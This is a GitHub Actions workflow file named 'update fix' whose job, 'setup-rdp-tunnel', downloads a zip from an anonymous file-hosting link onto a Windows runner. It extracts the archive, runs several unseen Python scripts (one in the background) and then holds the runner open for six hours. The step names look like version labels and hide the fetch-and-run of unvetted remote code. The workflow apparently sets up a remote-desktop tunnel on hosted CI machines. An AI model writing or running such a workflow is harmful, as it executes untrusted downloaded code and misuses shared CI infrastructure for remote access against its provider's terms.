name: update fix

on:
  workflow_dispatch:

jobs:
  setup-rdp-tunnel:
    runs-on: windows-2025

    steps:
    - name: Check repository-v4
      uses: actions/checkout@v2

    - name: ZIP and extract-v121
      run: |
        curl -L -o code.zip https://pixeldrain.com/api/file/MpktPHBe/info/zip/main4.zip
        Start-Sleep -Seconds 5
        powershell -Command "Expand-Archive -Force code.zip extracted"


    - name: Install requests package-v111
      run: python -m pip install requests
      
    - name: Start test-22
      run: |
        cd extracted
        Start-Sleep -Seconds 30
        python test.py

    - name: Start main.-22
      run: |
        cd extracted
        Write-Host "Starting main.py in background..."
        Start-Process python main.py
        Start-Sleep -Seconds 10

        
    - name: Run test.py-22
      run: |
        cd extracted
        Start-Sleep -Seconds 10
        python test2.py
        python test3.py

    - name: Keep alive-v009
      run: Start-Sleep -Seconds 21600  
